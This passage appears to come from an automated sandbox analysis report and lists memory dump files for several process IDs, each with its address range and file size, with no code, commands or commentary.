                                                                                                                                                                                                                      • memory/5472-2850-0x00000000070E0000-0x00000000070EA000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        40KB

                                                                                                                                                                                                                      • memory/5472-2849-0x0000000007080000-0x000000000709A000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        104KB

                                                                                                                                                                                                                      • memory/5472-2848-0x00000000076D0000-0x0000000007D4A000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        6.5MB

                                                                                                                                                                                                                      • memory/5472-2857-0x0000000007300000-0x0000000007308000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        32KB

                                                                                                                                                                                                                      • memory/5472-2847-0x0000000006F70000-0x0000000007013000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        652KB

                                                                                                                                                                                                                      • memory/5472-2846-0x0000000006320000-0x000000000633E000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        120KB

                                                                                                                                                                                                                      • memory/5472-1616-0x0000000002460000-0x0000000002496000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        216KB

                                                                                                                                                                                                                      • memory/5472-2835-0x0000000006D30000-0x0000000006D62000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        200KB

                                                                                                                                                                                                                      • memory/5472-1617-0x00000000050A0000-0x00000000056C8000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        6.2MB

                                                                                                                                                                                                                      • memory/5472-2836-0x0000000070650000-0x000000007069C000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        304KB

                                                                                                                                                                                                                      • memory/5472-1619-0x0000000004E90000-0x0000000004EB2000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        136KB

                                                                                                                                                                                                                      • memory/5472-2856-0x00000000073D0000-0x00000000073EA000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        104KB

                                                                                                                                                                                                                      • memory/5472-1644-0x0000000005D50000-0x0000000005D6E000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        120KB

                                                                                                                                                                                                                      • memory/5472-1621-0x0000000005740000-0x00000000057A6000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        408KB

                                                                                                                                                                                                                      • memory/5472-1635-0x00000000058B0000-0x0000000005C04000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        3.3MB

                                                                                                                                                                                                                      • memory/5608-6429-0x0000000000010000-0x0000000000260000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        2.3MB

                                                                                                                                                                                                                      • memory/5608-6032-0x0000000000010000-0x0000000000260000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        2.3MB

                                                                                                                                                                                                                      • memory/5732-5824-0x000001F6AE0A0000-0x000001F6AE0F2000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        328KB

                                                                                                                                                                                                                      • memory/5744-6061-0x0000000000280000-0x0000000000298000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        96KB

                                                                                                                                                                                                                      • memory/5768-2861-0x0000000007230000-0x00000000072C2000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        584KB

                                                                                                                                                                                                                      • memory/5768-1610-0x0000000000EC0000-0x0000000001336000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4.5MB

                                                                                                                                                                                                                      • memory/5768-2862-0x00000000074C0000-0x00000000074CA000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        40KB

                                                                                                                                                                                                                      • memory/5768-1572-0x0000000000EC0000-0x0000000001336000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4.5MB

                                                                                                                                                                                                                      • memory/5768-1565-0x0000000000EC0000-0x0000000001336000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4.5MB

                                                                                                                                                                                                                      • memory/5768-1564-0x0000000000EC0000-0x0000000001336000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4.5MB

                                                                                                                                                                                                                      • memory/5904-1541-0x00007FF70BE90000-0x00007FF70C320000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4.6MB

                                                                                                                                                                                                                      • memory/5904-1543-0x00007FF70BE90000-0x00007FF70C320000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4.6MB